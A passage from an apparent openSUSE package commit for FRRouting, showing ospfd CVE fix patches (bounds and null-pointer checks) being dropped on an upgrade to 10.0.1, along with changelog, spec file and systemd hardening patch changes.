The patch simply check if the te parser has found a valid local address. If not
found, we stop the parser which avoid the crash.
Signed-off-by: Olivier Dugeon <olivier.dugeon@orange.com>
diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
index 75f4e0c9f0..45eb205759 100644
--- a/ospfd/ospf_te.c
+++ b/ospfd/ospf_te.c
@@ -2276,6 +2276,10 @@ static int ospf_te_parse_te(struct ls_ted *ted, struct ospf_lsa *lsa)
}
/* Get corresponding Edge from Link State Data Base */
+ if (IPV4_NET0(attr.standard.local.s_addr) && !attr.standard.local_id) {
+ ote_debug(" |- Found no TE Link local address/ID. Abort!");
+ return -1;
+ }
edge = get_edge(ted, attr.adv, attr.standard.local);
old = edge->attributes;
--
2.35.3

67
0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch
View File

@ -1,67 +0,0 @@
From 298704f1e73221172432e2a4afd79086ffcd4cca Mon Sep 17 00:00:00 2001
From: Olivier Dugeon <olivier.dugeon@orange.com>
Date: Wed, 3 Apr 2024 16:28:23 +0200
Upstream: yes
References: CVE-2024-31950,bsc#1222526,gh#FRRouting/frr#16088
Subject: [PATCH 1/3] ospfd: Solved crash in RI parsing with OSPF TE
Iggy Frankovic discovered another ospfd crash when performing fuzzing of OSPF
LSA packets. The crash occurs in ospf_te_parse_ri() function when attemping to
read Segment Routing subTLVs. The original code doesn't check if the size of
the SR subTLVs have the correct length. In presence of erronous LSA, this will
cause a buffer overflow and ospfd crash.
This patch introduces new verification of the subTLVs size for Router
Information TLV.
Co-authored-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Olivier Dugeon <olivier.dugeon@orange.com>
(cherry picked from commit f69d1313b19047d3d83fc2b36a518355b861dfc4)
---
ospfd/ospf_te.c | 9 +++++++++
1 file changed, 9 insertions(+)
diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
index 45eb205759..885b915585 100644
--- a/ospfd/ospf_te.c
+++ b/ospfd/ospf_te.c
@@ -2483,6 +2483,9 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
switch (ntohs(tlvh->type)) {
case RI_SR_TLV_SR_ALGORITHM:
+ if (TLV_BODY_SIZE(tlvh) < 1 ||
+ TLV_BODY_SIZE(tlvh) > ALGORITHM_COUNT)
+ break;
algo = (struct ri_sr_tlv_sr_algorithm *)tlvh;
for (int i = 0; i < ntohs(algo->header.length); i++) {
@@ -2507,6 +2510,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case RI_SR_TLV_SRGB_LABEL_RANGE:
+ if (TLV_BODY_SIZE(tlvh) != RI_SR_TLV_LABEL_RANGE_SIZE)
+ break;
range = (struct ri_sr_tlv_sid_label_range *)tlvh;
size = GET_RANGE_SIZE(ntohl(range->size));
lower = GET_LABEL(ntohl(range->lower.value));
@@ -2524,6 +2529,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case RI_SR_TLV_SRLB_LABEL_RANGE:
+ if (TLV_BODY_SIZE(tlvh) != RI_SR_TLV_LABEL_RANGE_SIZE)
+ break;
range = (struct ri_sr_tlv_sid_label_range *)tlvh;
size = GET_RANGE_SIZE(ntohl(range->size));
lower = GET_LABEL(ntohl(range->lower.value));
@@ -2541,6 +2548,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case RI_SR_TLV_NODE_MSD:
+ if (TLV_BODY_SIZE(tlvh) < RI_SR_TLV_NODE_MSD_SIZE)
+ break;
msd = (struct ri_sr_tlv_node_msd *)tlvh;
if ((CHECK_FLAG(node->flags, LS_NODE_MSD))
&& (node->msd == msd->value))
--
2.35.3

109
0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch
View File

@ -1,109 +0,0 @@
From 4e70b09f24b72fbb27ff5eda63393bfd2a72ef37 Mon Sep 17 00:00:00 2001
From: Olivier Dugeon <olivier.dugeon@orange.com>
Date: Fri, 5 Apr 2024 12:57:11 +0200
Upstream: yes
References: CVE-2024-31951,bsc#1222528,gh#FRRouting/frr#16088
Subject: [PATCH 2/3] ospfd: Correct Opaque LSA Extended parser
Iggy Frankovic discovered another ospfd crash when performing fuzzing of OSPF
LSA packets. The crash occurs in ospf_te_parse_ext_link() function when
attemping to read Segment Routing Adjacency SID subTLVs. The original code
doesn't check if the size of the Extended Link TLVs and subTLVs have the correct
length. In presence of erronous LSA, this will cause a buffer overflow and ospfd
crashes.
This patch introduces new verification of the subTLVs size for Extended Link
TLVs and subTLVs. Similar check has been also introduced for the Extended
Prefix TLV.
Co-authored-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Olivier Dugeon <olivier.dugeon@orange.com>
(cherry picked from commit 5557a289acdaeec8cc63ffc97b5c2abf6dee7b3a)
---
ospfd/ospf_te.c | 35 +++++++++++++++++++++++++++++++++--
1 file changed, 33 insertions(+), 2 deletions(-)
diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
index 885b915585..23a1b181ec 100644
--- a/ospfd/ospf_te.c
+++ b/ospfd/ospf_te.c
@@ -2647,6 +2647,7 @@ static int ospf_te_parse_ext_pref(struct ls_ted *ted, struct ospf_lsa *lsa)
struct ext_tlv_prefix *ext;
struct ext_subtlv_prefix_sid *pref_sid;
uint32_t label;
+ uint16_t len, size;
/* Get corresponding Subnet from Link State Data Base */
ext = (struct ext_tlv_prefix *)TLV_HDR_TOP(lsa->data);
@@ -2668,6 +2669,18 @@ static int ospf_te_parse_ext_pref(struct ls_ted *ted, struct ospf_lsa *lsa)
ote_debug(" |- Process Extended Prefix LSA %pI4 for subnet %pFX",
&lsa->data->id, &pref);
+ /*
+ * Check Extended Prefix TLV size against LSA size
+ * as only one TLV is allowed per LSA
+ */
+ len = TLV_BODY_SIZE(&ext->header);
+ size = lsa->size - (OSPF_LSA_HEADER_SIZE + TLV_HDR_SIZE);
+ if (len != size || len <= 0) {
+ ote_debug(" |- Wrong TLV size: %u instead of %u",
+ (uint32_t)len, (uint32_t)size);
+ return -1;
+ }
+
/* Initialize TLV browsing */
ls_pref = subnet->ls_pref;
pref_sid = (struct ext_subtlv_prefix_sid *)((char *)(ext) + TLV_HDR_SIZE
@@ -2778,8 +2791,20 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
ote_debug(" |- Process Extended Link LSA %pI4 for edge %pI4",
&lsa->data->id, &edge->attributes->standard.local);
- /* Initialize TLV browsing */
- len = TLV_BODY_SIZE(&ext->header) - EXT_TLV_LINK_SIZE;
+ /*
+ * Check Extended Link TLV size against LSA size
+ * as only one TLV is allowed per LSA
+ */
+ len = TLV_BODY_SIZE(&ext->header);
+ i = lsa->size - (OSPF_LSA_HEADER_SIZE + TLV_HDR_SIZE);
+ if (len != i || len <= 0) {
+ ote_debug(" |- Wrong TLV size: %u instead of %u",
+ (uint32_t)len, (uint32_t)i);
+ return -1;
+ }
+
+ /* Initialize subTLVs browsing */
+ len -= EXT_TLV_LINK_SIZE;
tlvh = (struct tlv_header *)((char *)(ext) + TLV_HDR_SIZE
+ EXT_TLV_LINK_SIZE);
for (; sum < len; tlvh = TLV_HDR_NEXT(tlvh)) {
@@ -2789,6 +2814,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
switch (ntohs(tlvh->type)) {
case EXT_SUBTLV_ADJ_SID:
+ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_ADJ_SID_SIZE)
+ break;
adj = (struct ext_subtlv_adj_sid *)tlvh;
label = CHECK_FLAG(adj->flags,
EXT_SUBTLV_LINK_ADJ_SID_VFLG)
@@ -2815,6 +2842,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case EXT_SUBTLV_LAN_ADJ_SID:
+ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_LAN_ADJ_SID_SIZE)
+ break;
ladj = (struct ext_subtlv_lan_adj_sid *)tlvh;
label = CHECK_FLAG(ladj->flags,
EXT_SUBTLV_LINK_ADJ_SID_VFLG)
@@ -2844,6 +2873,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case EXT_SUBTLV_RMT_ITF_ADDR:
+ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_RMT_ITF_ADDR_SIZE)
+ break;
rmt = (struct ext_subtlv_rmt_itf_addr *)tlvh;
if (CHECK_FLAG(atr->flags, LS_ATTR_NEIGH_ADDR)
&& IPV4_ADDR_SAME(&atr->standard.remote,
--
2.35.3

82
0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch
View File

@ -1,82 +0,0 @@
From cef38442420aeac8e163f8aa55f1b985908f993c Mon Sep 17 00:00:00 2001
From: Olivier Dugeon <olivier.dugeon@orange.com>
Date: Tue, 16 Apr 2024 16:42:06 +0200
Upstream: yes
References: CVE-2024-34088,bsc#1223786,gh#FRRouting/frr#16088
Subject: [PATCH 3/3] ospfd: protect call to get_edge() in ospf_te.c
During fuzzing, Iggy Frankovic discovered that get_edge() function in ospf_te.c
could return null pointer, in particular when the link_id or advertised router
IP addresses are fuzzed. As the null pointer returned by get_edge() function is
not handlei by calling functions, this could cause ospfd crash.
This patch introduces new verification of returned pointer by get_edge()
function and stop the processing in case of null pointer. In addition, link ID
and advertiser router ID are validated before calling ls_find_edge_by_key() to
avoid the creation of a new edge with an invalid key.
CVE-2024-34088
Co-authored-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Olivier Dugeon <olivier.dugeon@orange.com>
(cherry picked from commit 8c177d69e32b91b45bda5fc5da6511fa03dc11ca)
---
ospfd/ospf_te.c | 19 ++++++++++++++++---
1 file changed, 16 insertions(+), 3 deletions(-)
diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
index 23a1b181ec..d1f114e30a 100644
--- a/ospfd/ospf_te.c
+++ b/ospfd/ospf_te.c
@@ -1686,6 +1686,11 @@ static struct ls_edge *get_edge(struct ls_ted *ted, struct ls_node_id adv,
struct ls_edge *edge;
struct ls_attributes *attr;
+ /* Check that Link ID and Node ID are valid */
+ if (IPV4_NET0(link_id.s_addr) || IPV4_NET0(adv.id.ip.addr.s_addr) ||
+ adv.origin != OSPFv2)
+ return NULL;
+
/* Search Edge that corresponds to the Link ID */
key = ((uint64_t)ntohl(link_id.s_addr)) & 0xffffffff;
edge = ls_find_edge_by_key(ted, key);
@@ -1758,6 +1763,10 @@ static void ospf_te_update_link(struct ls_ted *ted, struct ls_vertex *vertex,
/* Get Corresponding Edge from Link State Data Base */
edge = get_edge(ted, vertex->node->adv, link_data);
+ if (!edge) {
+ ote_debug(" |- Found no edge from Link Data. Abort!");
+ return;
+ }
attr = edge->attributes;
/* re-attached edge to vertex if needed */
@@ -2276,11 +2285,11 @@ static int ospf_te_parse_te(struct ls_ted *ted, struct ospf_lsa *lsa)
}
/* Get corresponding Edge from Link State Data Base */
- if (IPV4_NET0(attr.standard.local.s_addr) && !attr.standard.local_id) {
- ote_debug(" |- Found no TE Link local address/ID. Abort!");
+ edge = get_edge(ted, attr.adv, attr.standard.local);
+ if (!edge) {
+ ote_debug(" |- Found no edge from Link local add./ID. Abort!");
return -1;
}
- edge = get_edge(ted, attr.adv, attr.standard.local);
old = edge->attributes;
ote_debug(" |- Process Traffic Engineering LSA %pI4 for Edge %pI4",
@@ -2786,6 +2795,10 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
lnid.id.ip.area_id = lsa->area->area_id;
ext = (struct ext_tlv_link *)TLV_HDR_TOP(lsa->data);
edge = get_edge(ted, lnid, ext->link_data);
+ if (!edge) {
+ ote_debug(" |- Found no edge from Extended Link Data. Abort!");
+ return -1;
+ }
atr = edge->attributes;
ote_debug(" |- Process Extended Link LSA %pI4 for edge %pI4",
--
2.35.3

BIN
frr-10.0.1.tar.gz (Stored with Git LFS) Normal file
View File

Binary file not shown.

3
frr-8.4.tar.gz
View File

@ -1,3 +0,0 @@
version https://git-lfs.github.com/spec/v1
oid sha256:4fe5dccf6d41218c3012c2b09c85c4cd65a96299ab400e487191515232f0ee8a
size 9883194

34
frr.changes
View File

@ -1,4 +1,38 @@
-------------------------------------------------------------------
Fri Aug 9 14:14:10 UTC 2024 - Erico Mendonca <erico.mendonca@suse.com>
- Fixing Source URL/archive name.
-------------------------------------------------------------------
Sun Jul 28 20:21:43 UTC 2024 - Erico Mendonca <erico.mendonca@suse.com> - 10.0.1
- Update to version 10.0.1 from official sources.
- Clean slate: removing all previous patches.
- The following patches were obsoleted:
- 0001-disable-zmq-test.patch
- harden_frr.service.patch
- 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch
- 0004-tools-remove-backslash-from-declare-check-regex.patch
- 0005-root-ok-in-account-frr.pam.patch
- 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch
- 0007-bgpd-Ensure-stream-received-has-enough-data.patch
- 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch
- 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch
- 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch
- 0011-babeld-fix-11808-to-avoid-infinite-loops.patch
- 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch
- 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch
- 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch
- 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch
- 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch
- 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch
- 0018-bgpd-Flowspec-overflow-issue.patch
- 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch
- 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch
- 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch
- 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch
- 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch
-------------------------------------------------------------------
Tue Jun 4 21:27:48 UTC 2024 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix solving ospfd denial of service via get_edge()

73
frr.spec
View File

@ -30,38 +30,15 @@
%define frr_daemondir %{_prefix}/lib/frr
Name: frr
Version: 8.4
Version: 10.0.1
Release: 0
Summary: FRRouting Routing daemon
Summary: The FRRouting Protocol Suite
License: GPL-2.0-or-later AND LGPL-2.1-or-later
Group: Productivity/Networking/System
URL: https://www.frrouting.org
#Git-Clone: https://github.com/FRRouting/frr.git
Source: https://github.com/FRRouting/frr/archive/refs/tags/%{name}-%{version}.tar.gz
Source1: %{name}-tmpfiles.d
Patch1: 0001-disable-zmq-test.patch
Patch2: harden_frr.service.patch
Patch3: 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch
Patch4: 0004-tools-remove-backslash-from-declare-check-regex.patch
Patch5: 0005-root-ok-in-account-frr.pam.patch
Patch6: 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch
Patch7: 0007-bgpd-Ensure-stream-received-has-enough-data.patch
Patch8: 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch
Patch9: 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch
Patch10: 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch
Patch11: 0011-babeld-fix-11808-to-avoid-infinite-loops.patch
Patch12: 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch
Patch13: 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch
Patch14: 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch
Patch15: 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch
Patch16: 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch
Patch17: 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch
Patch18: 0018-bgpd-Flowspec-overflow-issue.patch
Patch19: 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch
Patch20: 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch
Patch21: 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch
Patch22: 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch
Patch23: 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch
BuildRequires: autoconf
BuildRequires: automake
BuildRequires: bison >= 2.7
@ -89,6 +66,10 @@ BuildRequires: pkgconfig(libcares)
BuildRequires: pkgconfig(libelf)
BuildRequires: pkgconfig(libpcre)
BuildRequires: pkgconfig(libprotobuf-c)
%if 0%{?sle_version} == 150500
BuildRequires: libprotoc25_1_0
BuildRequires: libyang1
%endif
BuildRequires: pkgconfig(libsystemd)
BuildRequires: pkgconfig(libyang) >= 2.0.0
BuildRequires: pkgconfig(libzmq) >= 4.0.0
@ -107,11 +88,24 @@ Provides: group(%{frrvty_group})
Provides: user(%{frr_user})
%description
FRR is free software which manages TCP/IP based routing protocols.
It supports BGP4, BGP4+, OSPFv2, OSPFv3, IS-IS, RIPv1, RIPv2, RIPng,
PIM and LDP as well as the IPv6 versions of these.
FRR is a fork of Quagga..
FRR is free software that implements and manages various IPv4 and IPv6 routing protocols.
FRR currently supports the following protocols:
- BGP
- OSPFv2
- OSPFv3
- RIPv1
- RIPv2
- RIPng
- IS-IS
- PIM-SM/MSDP
- LDP
- BFD
- Babel
- PBR
- OpenFabric
- VRRP
- EIGRP (alpha)
- NHRP (alpha)
%package -n libfrrfpm_pb0
Summary: FRRouting fpm protobuf library
@ -174,12 +168,12 @@ Group: System/Libraries
This library contains various utility functions to FRRouting, such as
data types, buffers and socket handling.
%package -n libmlag_pb0
%package -n libmgmt_be_nb0
Summary: FRRouting utility library
Group: System/Libraries
%description -n libmlag_pb0
This library contains part of the mlag implementation of FRRouting.
%description -n libmgmt_be_nb0
This library contains part of the mgmt_be implementation of FRRouting.
%package devel
Summary: Header and object files for frr development
@ -194,7 +188,7 @@ Requires: libfrrgrpc_pb0 = %{version}
Requires: libfrrospfapiclient0 = %{version}
Requires: libfrrsnmp0 = %{version}
Requires: libfrrzmq0 = %{version}
Requires: libmlag_pb0 = %{version}
Requires: libmgmt_be_nb0 = %{version}
%description devel
The frr-devel package contains the header and object files necessary for
@ -385,11 +379,11 @@ done
%post -n libfrrcares0 -p /sbin/ldconfig
%postun -n libfrrcares0 -p /sbin/ldconfig
%post -n libmlag_pb0 -p /sbin/ldconfig
%postun -n libmlag_pb0 -p /sbin/ldconfig
%post -n libmgmt_be_nb0 -p /sbin/ldconfig
%postun -n libmgmt_be_nb0 -p /sbin/ldconfig
%files
%license COPYING COPYING-LGPLv2.1
%license COPYING
%doc README.md
%doc doc/mpls
%dir %attr(750,%{frr_user},%{frr_user}) %{_sysconfdir}/%{name}
@ -433,6 +427,7 @@ done
%{frr_daemondir}/frrinit.sh
%{frr_daemondir}/isisd
%{frr_daemondir}/ldpd
%{frr_daemondir}/mgmtd
%{frr_daemondir}/nhrpd
%{frr_daemondir}/ospfclient.py
%{frr_daemondir}/ospf6d
@ -489,8 +484,8 @@ done
%files -n libfrrcares0
%{_libdir}/libfrrcares.so.0*
%files -n libmlag_pb0
%{_libdir}/libmlag_pb.so.0*
%files -n libmgmt_be_nb0
%{_libdir}/libmgmt_be_nb.so.0*
%files devel
%dir %{_includedir}/%{name}

42
harden_frr.service.patch
View File

@ -1,42 +0,0 @@
Index: frr-frr-8.1/tools/frr.service.in
===================================================================
--- frr-frr-8.1.orig/tools/frr.service.in
+++ frr-frr-8.1/tools/frr.service.in
@@ -7,6 +7,16 @@ Before=network.target
OnFailure=heartbeat-failed@%n
[Service]
+# added automatically, for details please see
+# https://en.opensuse.org/openSUSE:Security_Features#Systemd_hardening_effort
+ProtectSystem=full
+ReadWritePaths=/etc/frr
+ProtectHome=true
+ProtectKernelModules=true
+ProtectKernelLogs=true
+ProtectControlGroups=true
+RestrictRealtime=true
+# end of automatic additions
Nice=-5
Type=forking
NotifyAccess=all
Index: frr-frr-8.1/tools/frr@.service.in
===================================================================
--- frr-frr-8.1.orig/tools/frr@.service.in
+++ frr-frr-8.1/tools/frr@.service.in
@@ -7,6 +7,16 @@ Before=network.target
OnFailure=heartbeat-failed@%n
[Service]
+# added automatically, for details please see
+# https://en.opensuse.org/openSUSE:Security_Features#Systemd_hardening_effort
+ProtectSystem=full
+ReadWritePaths=/etc/frr
+ProtectHome=true
+ProtectKernelModules=true
+ProtectKernelLogs=true
+ProtectControlGroups=true
+RestrictRealtime=true
+# end of automatic additions
Nice=-5
Type=forking
NotifyAccess=all